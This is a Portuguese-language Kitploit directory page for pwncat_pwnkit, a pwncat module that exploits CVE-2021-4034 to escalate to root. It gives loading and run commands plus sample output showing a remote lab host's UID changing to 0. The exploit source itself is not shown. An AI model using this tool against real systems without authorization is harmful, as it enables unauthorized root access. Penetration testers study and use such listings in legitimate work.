Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pwncat_pwnkit — módulo pwncat que explora automaticamente o CVE-2021-4034 (pwnkit) | Kitploit
Ferramentas/GitHubGitHub/danaepp/pwncat_pwnkit
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de Penetração
GitHubdanaepp/pwncat_pwnkit

pwncat_pwnkit

módulo pwncat que explora automaticamente o CVE-2021-4034 (pwnkit)

Ver Repositório
328há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

pwncat_pwnkit

asciicast

Introdução

O objetivo deste módulo é tentar explorar o CVE-2021-4034 (pwnkit) em um alvo ao usar o pwncat.

Não é necessário configurar diretórios, compilar qualquer código-fonte ou até mesmo ter gcc no alvo remoto; o módulo pwnkit cuida disso automaticamente usando o framework pwncat.

Configuração e Uso

  • Basta copiar pwnkit.py para algum lugar no seu host onde o pwncat-cs esteja instalado. Ex.: /home/user/pwncat_mods
  • No pwncat, basta digitar: load /home/user/pwncat_mods
  • Para confirmar que o módulo foi carregado, digite: search pwnkit. Você deve ver algo assim:
root@kitploit:~
(local) pwncat$ search pwnkit
                                                      Results                                                      
                   ╷                                                                                               
  Name             │ Description                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 to privesc to root
  • Para executar, basta digitar run pwnkit. Se for bem-sucedido, você deve ver o UID mudar para 0, e agora ser root. Ex.:
root@kitploit:~
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

Dicas

  • Se você não quiser chamar load sempre, pode fazer o pwncat carregar este módulo automaticamente na inicialização colocando-o em ~/.local/share/pwncat/modules
  • Para usar o cross-compiler para compilar o exploit na sua máquina e enviá-lo ao alvo, você precisa definir a variável cross no seu arquivo pwncatrc. Este arquivo normalmente é encontrado em ~/.local/share/pwncat/pwncatrc`. Ex.:
root@kitploit:~
# Set the gcc path
set cross "/usr/bin/gcc"

Agradecimentos

Um agradecimento especial ao Caleb Stewart por ser prestativo enquanto eu avançava no aprendizado do framework pwncat sob uma perspectiva de desenvolvedor. Vou fazer um pull request para colocar isso no módulo principal de escalonamento do pwncat algum dia quando tiver tempo livre... Eu prometo. :-)

Baixar ferramenta